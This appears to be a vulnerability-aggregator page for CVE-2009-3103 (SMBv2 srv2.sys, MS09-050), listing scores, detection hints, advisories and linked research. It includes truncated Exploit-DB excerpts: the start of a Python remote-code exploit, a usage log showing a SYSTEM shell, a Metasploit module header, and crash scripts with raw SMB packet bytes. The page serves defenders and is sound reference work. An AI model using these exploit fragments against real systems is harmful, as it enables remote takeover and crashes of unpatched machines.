CVE-2009-3103
published 2009-09-08CVE-2009-3103: Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows…
PriorityP181critical10CVSS 2.0
AVNACLAuNCCICAC
ITWEXPLOITVulnCheck KEVRansomwareInitial access
Exploited in the wild
EPSS
90.12%
99.8th percentile
Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect CVE-2009-3103 exploitation by monitoring for an ampersand character in the Process ID High header field of SMBv2 NEGOTIATE PROTOCOL REQUEST packets on port 445/tcp. ↗
- →A malformed SMBv2 Negotiate Protocol Response (4-byte payload \x00\x00\x00\x01) immediately followed by connection close causes Windows SMB2 hosts to crash; monitor for anomalously short SMB negotiate responses on port 445. ↗
- →The Metasploit module ms09_050_smb2_negotiate_func_index (exploit/windows/smb/ms09_050_smb2_negotiate_func_index) targets port 445/tcp; alert on exploit traffic matching this module's 951-byte exploit packet. ↗
- →An SMB2 logoff request sent before a session has been correctly negotiated triggers a NULL pointer dereference in SRV2.SYS; monitor for out-of-order SMB2 LOGOFF commands on port 445/tcp. ↗
- →Use Nessus Plugin ID 40877 (uncredentialed network check) to remotely detect unpatched CVE-2009-3103 hosts without credentials. ↗
- ·The vulnerability is reliably exploitable only on 32-bit systems; 64-bit systems may not be exploitable with the same reliability. ↗
- ·The DoS variant (ms09_050_smb2_session_logoff) affects Vista SP1/SP2 and possibly Server 2008 SP1/SP2; scope may differ from the RCE variant. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-47wf-g7rm-46qq: Array index error in the SMBv2 protocol implementation in srv2
ghsa_unreviewed·2022-05-02
CVE-2009-3103 [HIGH] GHSA-47wf-g7rm-46qq: Array index error in the SMBv2 protocol implementation in srv2
Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
VulnCheck
Microsoft Windows SMBv2 srv2.sys Remote Code Execution
vulncheck·2009·CVSS 10.0
CVE-2009-3103 [CRITICAL] Microsoft Windows SMBv2 srv2.sys Remote Code Execution
Microsoft Windows SMBv2 srv2.sys Remote Code Execution
Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known
No detection rules found.
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)
exploitdb·2016-02-26
CVE-2009-3103 Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)
---
# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py
#!/usr/bin/python
#This module depends on the linux command line program smbclient.
#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.
import tempfile
import sys
import subprocess
from socket import socket
from time import sleep
from smb.SMBConnection import SMBConnection
try:
target = sys.argv[1]
except IndexError:
print '\nUsage: %s \n' % sys.a
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)
exploitdb·2010-08-17
CVE-2009-3103 Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)
---
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Exploited by Piotr Bania // www.piotrbania.com
Exploit for Vista SP2/SP1 only, should be reliable!
Tested on:
Vista sp2 (6.0.6002.18005)
Vista sp1 ultimate (6.0.6001.18000)
Kudos for:
Stephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace.
Special kudos for prdelka for testing this shit and all the hosters.
Sample usage
> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
When all is done it should spawn a port TARGET_IP:2
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
exploitdb·2010-07-03
CVE-2009-3103 Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
---
##
# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
release candidates (not RTM), and Windows 2008 Serv
Exploit-DB
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service
exploitdb·2010-05-07
CVE-2009-3103 Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service
---
#!/usr/bin/python
# === EDIT – this exploit appears to be exactly the same one of one which was already found
# and fixed notified by Laurent Gaffié, i did not know this but his blog post can be found here:
# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
import socket,sys,time
print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at http://h.ackack.net/?p=387"
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smb.listen(1)
smbconn, addr = smb.acc
Exploit-DB
Microsoft Windows 7/2008 R2 - Remote Kernel Crash
exploitdb·2009-11-11
CVE-2009-3103 Microsoft Windows 7/2008 R2 - Remote Kernel Crash
Microsoft Windows 7/2008 R2 - Remote Kernel Crash
---
#!/usr/bin/python
# win7-crash.py:
# Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
# Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an
#infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffi�
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\
Exploit-DB
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)
exploitdb·2009-09-09
CVE-2009-3103 Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)
---
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
I. VULNERABILITY
Windows Vista, Server 2008 :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32
Metasploit
Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
metasploit
Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. Affecting Vista SP1/SP2 (and possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.
Metasploit
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
metasploit
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
Metasploit
MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
metasploit
MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
arXiv
Tiresias: Predicting Security Events Through Deep Learning
arxiv_fulltext·2019-05-24
Tiresias: Predicting Security Events Through Deep Learning
et al.
e.g.,
i.e.,
10.1145/3243734.3243811
2018
2018
acmlicensed
[CCS '18]2018 ACM SIGSAC Conference on Computer and Communications SecurityOctober 15--19, 2018Toronto, ON, Canada
2018 ACM SIGSAC Conference on Computer and Communications Security (CCS '18), October 15--19, 2018, Toronto, ON, Canada
15.00
: Predicting Security Events Through Deep Learning
Yun Shen^ , Enrico Mariconti^ , Pierre-Antoine Vervier^ , and Gianluca Stringhini^
^ Symantec Research Labs, ^ University College London, ^ Boston University
\yun_shen,pierre-antoine_vervier\@symantec.com, [email protected], [email protected]
## Abstract
With the increased complexity of modern computer attacks, there is a need for defenders not only to detect malicious activity as it happens, but also to predict the specific steps tha
arXiv
Securing The Kernel via Static Binary Rewriting and Program Shepherding
arxiv_fulltext·2011-05-10
Securing The Kernel via Static Binary Rewriting and Program Shepherding
## Abstract
Recent Microsoft security bulletins show that kernel vulnerabilities are becoming more and more important security threats. Despite the pretty extensive security mitigations many of the kernel vulnerabilities are still exploitable. Successful kernel exploitation typically grants the attacker maximum privilege level and results in total machine compromise.
To protect against kernel exploitation, we have developed a tool which statically rewrites the Microsoft Windows kernel as well as other kernel level modules. Such rewritten binary files allow us to monitor control flow transfers during operating system execution. At this point we are able to detect whether selected control transfer flow is valid or should be considered as an attack attempt.
Our solution is especially direc
Tenable
Using Nessus and Metasploit Together
blogs_tenable·2011-08-08
Using Nessus and Metasploit Together
Blog /
Subscribe
# Using Nessus and Metasploit Together
Paul Asadoorian
August 8, 2011
8 Min Read
### Security Tools Working Together
This is the third in a series of posts that describe the use of Nessus on BackTrack 5. Previous posts covered how to activate Nessus on BackTrack 5 and how to integrate Nmap, Hydra, and Nikto with Nessus. In this post we will cover initiating Nessus scans from within Metasploit. Beginning with Nessus 4, Tenable introduced the Nessus API, which lets users programmatically interface with a Nessus server using XMLRPC. Zate Berg took the initiative to write modules in Metasploit that, among other things, can launch a Nessus scan and import the results into the Metasploit database. From there, we can find which hosts are vulnerable to exploitation, exploit
Tenable
Using Nessus and Metasploit Together
blogs_tenable·2011-08-08
Using Nessus and Metasploit Together
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Microsoft "Patch Tuesday" - The Aftermath
blogs_tenable·2009-10-19
Microsoft "Patch Tuesday" - The Aftermath
Blog /
Subscribe
# Microsoft "Patch Tuesday" - The Aftermath
Paul Asadoorian
October 19, 2009
6 Min Read
### Black Tuesday
This month Microsoft released 13 new security advisories. While 13 sounds like a moderate number, digging into each of the security advisories reveals that each one actually patches multiple vulnerabilities, bringing the grand total to 34 individual vulnerabilities. Couple that with the recent Adobe announcements disclosing 29 vulnerabilities with the Adobe Reader product and release of the associated patches and administrators have their work cut out for them (note that Nessus plugins have been released to detect these vulnerabilities, refer to plugin id 42119 and 42120). Assessing the risk for your organization when there are this many patches in common softwar
Tenable
Microsoft "Patch Tuesday" - The Aftermath
blogs_tenable·2009-10-19
Microsoft "Patch Tuesday" - The Aftermath
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
NoiseLetter March 2025
blogs_greynoiseio
NoiseLetter March 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0090.htmlhttp://blog.48bits.com/?p=510http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.htmlhttp://isc.sans.org/diary.html?storyid=7093http://osvdb.org/57799http://secunia.com/advisories/36623http://www.exploit-db.com/exploits/9594http://www.kb.cert.org/vuls/id/135940http://www.microsoft.com/technet/security/advisory/975497.mspxhttp://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1http://www.securityfocus.com/archive/1/506300/100/0/threadedhttp://www.securityfocus.com/archive/1/506327/100/0/threadedhttp://www.securityfocus.com/bid/36299http://www.securitytracker.com/id?1022848http://www.us-cert.gov/cas/techalerts/TA09-286A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050https://exchange.xforce.ibmcloud.com/vulnerabilities/53090https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6489http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0090.htmlhttp://blog.48bits.com/?p=510http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.htmlhttp://isc.sans.org/diary.html?storyid=7093http://osvdb.org/57799http://secunia.com/advisories/36623http://www.exploit-db.com/exploits/9594http://www.kb.cert.org/vuls/id/135940http://www.microsoft.com/technet/security/advisory/975497.mspxhttp://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1http://www.securityfocus.com/archive/1/506300/100/0/threadedhttp://www.securityfocus.com/archive/1/506327/100/0/threadedhttp://www.securityfocus.com/bid/36299http://www.securitytracker.com/id?1022848http://www.us-cert.gov/cas/techalerts/TA09-286A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050https://exchange.xforce.ibmcloud.com/vulnerabilities/53090https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6489
2009-09-08
Published
Exploited in the wild